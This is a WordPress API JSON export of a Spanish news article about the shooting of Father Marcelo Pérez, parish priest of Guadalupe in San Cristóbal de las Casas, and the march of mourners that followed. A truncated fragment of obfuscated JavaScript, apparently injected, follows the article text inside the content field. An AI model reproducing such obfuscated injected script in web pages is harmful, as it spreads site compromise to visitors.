{"id":18455,"date":"2024-10-21T03:37:32","date_gmt":"2024-10-21T03:37:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18455"},"modified":"2024-10-21T03:37:33","modified_gmt":"2024-10-21T03:37:33","slug":"asesinan-al-padre-marcelo-parroco-de-la-iglesia-de-guadalupe","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18455","title":{"rendered":"Asesinan al padre Marcelo, p\u00e1rroco de la iglesia de Guadalupe"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"960\" data-id=\"18456\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-20-at-4.00.34-PM.jpeg\" alt=\"\" class=\"wp-image-18456\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-20-at-4.00.34-PM.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-20-at-4.00.34-PM-225x300.jpeg 225w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"529\" height=\"515\" data-id=\"18457\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-20-at-8.23.50-AM.jpeg\" alt=\"\" class=\"wp-image-18457\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-20-at-8.23.50-AM.jpeg 529w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/WhatsApp-Image-2024-10-20-at-8.23.50-AM-300x292.jpeg 300w\" sizes=\"auto, (max-width: 529px) 100vw, 529px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>20 de octubre del 2014 . San Crist\u00f3bal de las Casas.- El p\u00e1rroco de la iglesia de Guadalupe, Marcelo P\u00e9rez, fue asesinado en Cuxtitali luego de oficiar la misa dominical. Seg\u00fan los primeros reportes, sujetos a bordo de una motocicleta le dispararon mientras se encontraba dentro de su veh\u00edculo, un Ford Titanium blanco.<\/p>\n\n\n\n<p>El ataque ocurri\u00f3 en las inmediaciones de la iglesia de Cuxtitali, donde el padre Marcelo ejerc\u00eda su labor pastoral. Su muerte ha causado un profundo dolor entre los fieles de la ciudad, quienes lo reconoc\u00edan no solo por su cercan\u00eda con la comunidad, sino tambi\u00e9n por su firme compromiso con las causas sociales. Aunque su labor estaba vinculada con el conflicto en Pantelh\u00f3, relacionado con el grupo &#8220;El machete&#8221;, el sacerdote siempre fue percibido como una figura pac\u00edfica.<\/p>\n\n\n\n<p>Las autoridades locales ya han iniciado investigaciones para esclarecer los hechos y dar con los responsables de este crimen que ha golpeado a la sociedad sancristobalense.<\/p>\n\n\n\n<p>Reacciones y movilizaciones<\/p>\n\n\n\n<p>Tras conocerse la noticia, la Di\u00f3cesis de San Crist\u00f3bal emiti\u00f3 un comunicado en el que lamenta profundamente el asesinato del sacerdote y exige justicia. Organizaciones sociales tambi\u00e9n han condenado el ataque, subrayando la necesidad de esclarecer el caso.<\/p>\n\n\n\n<p>En respuesta al dolor colectivo, cientos de cat\u00f3licos se congregaron en la Plazuela de Guadalupe, desde donde iniciaron una marcha por las principales calles de la ciudad. En un acto de homenaje, los fieles acompa\u00f1aron el cuerpo del padre Marcelo a la parroquia de Guadalupe, donde este lunes a las 10 de la ma\u00f1ana se realizar\u00e1 una misa en su honor. Posteriormente, ser\u00e1 llevado a la Catedral de San Crist\u00f3bal y, finalmente, trasladado a su comunidad de origen en el municipio de El Bosque.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 20 de octubre del 2014 . San Crist\u00f3bal de las Casas.- El p\u00e1rroco de la iglesia de Guadalupe, Marcelo P\u00e9rez, fue asesinado en Cuxtitali luego de oficiar la misa dominical. Seg\u00fan los primeros reportes, sujetos a bordo de una motocicleta le dispararon mientras se encontraba dentro de su veh\u00edculo, un Ford Titanium &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18457,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18455","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18455","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18455"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18455\/revisions"}],"predecessor-version":[{"id":18458,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18455\/revisions\/18458"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18457"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18455"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18455"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18455"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}